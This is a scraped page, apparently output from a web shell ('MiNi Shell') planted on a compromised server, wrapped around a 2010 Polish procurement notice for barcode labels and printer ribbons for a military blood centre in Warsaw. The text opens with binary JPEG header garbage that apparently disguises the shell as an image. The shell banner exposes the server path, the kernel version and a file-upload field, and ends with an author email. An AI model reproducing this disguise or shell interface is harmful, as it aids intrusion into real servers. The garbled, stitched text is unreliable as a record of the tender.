JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/337963-N-2010.html

<p class="kh_header"><b>Warszawa: Dostawa etykiet z kodem kreskowym, etykiet i wkładów barwiących</b><br>
<b>Numer ogłoszenia: 337963 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa SP ZOZ , ul. Koszykowa 78, 00-671 Warszawa, woj. mazowieckie, tel. 022 6 845 557, faks 022 6 845 135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa etykiet z kodem kreskowym, etykiet i wkładów barwiących.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Pakiet nr 1: Etykiety donacyjne, z kodem kreskowym, (donacja 2 x 24 sztuki). Ilość:	39000 donacji.				
Opis przedmiotu zamówienia
1. Kod kreskowy musi być zgodny ze standardem ISBT 128 i współpracować z systemem informatycznym ,Bank Krwi wykorzystywanym przez Zamawiającego.
2. Kod kreskowy z numerem donacji musi zawierać 16 znakowy ciąg alfa numeryczny.
3. W kodzie występuje obowiązkowo cyfra kontrolna kodowana na końcu symbolu, przed znakiem stop.
4. Znak kontrolny nie jest uwidaczniany wśród znaków czytelnych wzrokowo. Cyfra kontrolna jest liczona według algorytmu modulo 103. 
5. Kod jest kodem ciągłym. 
6. Znaki mają po trzy kreski ciemne i trzy jasne, zbudowane z 1, 2, 3 lub 4 modułów, tzn., że w kodzie występują kreski o czterech szerokościach. 
7. Każdy symbol kodu musi posiadać znak kontrolny i stop oraz lewy i prawy margines o szerokości 10 x X (gdzie X=0,19mm do 1,27mm). 
8. Kod jest samosprawdzalny. 
9. Pod kodem kreskowym musi być wydrukowany numer donacji w formie ciągu alfa numerycznego. 
10. Ten sam numer donacji i kod ma być wyrażony na 24 nalepkach: 12 nalepek o wymiarach 10 cm x 2cm oraz 12 nalepek o wymiarach 5 cm x 1,5 cm, które będą umieszczone na dwóch równych paskach. Każdy z pasków zawiera 4 nalepki o wymiarach 10cm x 2 cm i 8 nalepek o wymiarach 5 cm x 1,5 cm. 
11. Do każdej dostawy Wykonawca dołączy protokół kontroli jakości.
12. Etykiety donacyjne z kodem kreskowym (zgodne ze standardem ISBT 128, w kodzie Subset C) kompatybilne dla systemu Bank Krwi wykorzystywanym przez Zamawiającego.
13. Wykonawca dołączy dokument potwierdzający, że jest autoryzowanym przedstawicielem ICCBBA na użytkowanie standardu ISBT 128.
14. Wykonawca dołączy dokument potwierdzający, że materiał użyty do wykonania etykiet samoprzylepnych może być użyty do etykietowania pojemników z krwią ludzką i jej składnikami.
Wymagane w ofercie dokumenty: Wykonawca przedłoży  dokument potwierdzający:
1) że jest autoryzowanym przedstawicielem ICCBBA na użytkowanie standardu ISBT 128,
2) że materiał użyty do wykonania etykiet samoprzylepnych może być użyty do etykietowania pojemników z krwią ludzką i jej składnikami.
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie.
Pakiet nr 2: 
1. Etykiety główne - Etykiety czyste 101,6 x 101,6 mm (4x4 cale ) (rolka 485 sztuk) do drukarki Clever 243. Ilość:	188 rolek;				
2. Etykiety na pilotki - Etykiety czyste 50 x 25 mm (rolka 1700 sztuk) do drukarki Clever 243. Ilość:	183 rolki;				
Etykiety muszą być kompatybilne z drukarkami termotransferowymi TSC Clever 243, które posiada Zamawiający. 
Etykiety będą wykorzystywane do oklejania pojemników z krwią.
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie.
Pakiet nr 3:
1. Taśma barwiąca -Taśma termotransferowa o wymiarach  104 mm x 153 m do drukarki  Clever 243. Ilość: 115 sztuk;				
2. Taśma barwiąca - Taśma termotransferowa o wymiarach 50 mm x 153 m do drukarki Clever 243. Ilość: 130 sztuk;			
Taśmy muszą być kompatybilne z drukarkami termotransferowymi TSC Clever 243, które posiada Zamawiający. 
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2, 30.19.97.60-5, 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dokumentów określonych w arkuszu asortymentowo-cenowym, stanowiącym Załącznik Nr 5/1 do SIWZ.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Koszykowa 78
00-671 Warszawa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 09:00, miejsce: Wojskowe Centrum Krwiodawstwa i Krwiolecznictwa
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Koszykowa 78
00-671 Warszawa 1
kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Etykiety z kodem kreskowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etykiety donacyjne, z kodem kreskowym, (donacja 2 x 24 sztuki).	 Ilość: 39000 donacji.				
Opis przedmiotu zamówienia
1. Kod kreskowy musi być zgodny ze standardem ISBT 128 i współpracować z systemem informatycznym Bank Krwi wykorzystywanym przez Zamawiającego.
2. Kod kreskowy z numerem donacji musi zawierać 16 znakowy ciąg alfa numeryczny.
3. W kodzie występuje obowiązkowo cyfra kontrolna kodowana na końcu symbolu, przed znakiem stop.
4. Znak kontrolny nie jest uwidaczniany wśród znaków czytelnych wzrokowo. Cyfra kontrolna jest liczona według algorytmu modulo 103. 
5. Kod jest kodem ciągłym. 
6. Znaki mają po trzy kreski ciemne i trzy jasne, zbudowane z 1, 2, 3 lub 4 modułów, tzn., że w kodzie występują kreski o czterech szerokościach. 
7. Każdy symbol kodu musi posiadać znak kontrolny i stop oraz lewy i prawy margines o szerokości 10 x X (gdzie X=0,19mm do 1,27mm). 
8. Kod jest samosprawdzalny. 
9. Pod kodem kreskowym musi być wydrukowany numer donacji w formie ciągu alfa numerycznego. 
10. Ten sam numer donacji i kod ma być wyrażony na 24 nalepkach: 12 nalepek o wymiarach 10 cm x 2cm oraz 12 nalepek o wymiarach 5 cm x 1,5 cm, które będą umieszczone na dwóch równych paskach. Każdy z pasków zawiera 4 nalepki o wymiarach 10cm x 2 cm i 8 nalepek o wymiarach 5 cm x 1,5 cm. 
11. Do każdej dostawy Wykonawca dołączy protokół kontroli jakości.
12. Etykiety donacyjne z kodem kreskowym (zgodne ze standardem ISBT 128, w kodzie Subset C) kompatybilne dla systemu Bank Krwi wykorzystywanym przez Zamawiającego.
13. Wykonawca dołączy dokument potwierdzający, że jest autoryzowanym przedstawicielem ICCBBA na użytkowanie standardu ISBT 128.
14. Wykonawca dołączy dokument potwierdzający, że materiał użyty do wykonania etykiet samoprzylepnych może być użyty do etykietowania pojemników z krwią ludzką i jej składnikami.
Wymagane w ofercie dokumenty: Wykonawca przedłoży  dokument potwierdzający:
1) że jest autoryzowanym przedstawicielem ICCBBA na użytkowanie standardu ISBT 128,
2) że materiał użyty do wykonania etykiet samoprzylepnych może być użyty do etykietowania pojemników z krwią ludzką i jej składnikami.
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Etykiety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Etykiety główne - Etykiety czyste 101,6 x 101,6 mm (4x4 cale ) (rolka 485 sztuk) do drukarki Clever 243. Ilość:	188 rolek;				
2. Etykiety na pilotki - Etykiety czyste 50 x 25 mm (rolka 1700 sztuk) do drukarki Clever 243. Ilość:	183 rolki;				
Etykiety muszą być kompatybilne z drukarkami termotransferowymi TSC Clever 243, które posiada Zamawiający. 
Etykiety będą wykorzystywane do oklejania pojemników z krwią.
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.60-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wkłady barwiące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Taśma barwiąca -Taśma termotransferowa o wymiarach  104 mm x 153 m do drukarki  Clever 243. Ilość: 115 sztuk;				
2. Taśma barwiąca - Taśma termotransferowa o wymiarach 50 mm x 153 m do drukarki Clever 243. Ilość: 130 sztuk;				
Taśmy muszą być kompatybilne z drukarkami termotransferowymi TSC Clever 243, które posiada Zamawiający. 
Miejsce dostaw: WCKiK w Warszawie oraz podległe Terenowe Stacje w Bydgoszczy, Wrocławiu, Krakowie, Szczecinie, Ełku, Lublinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com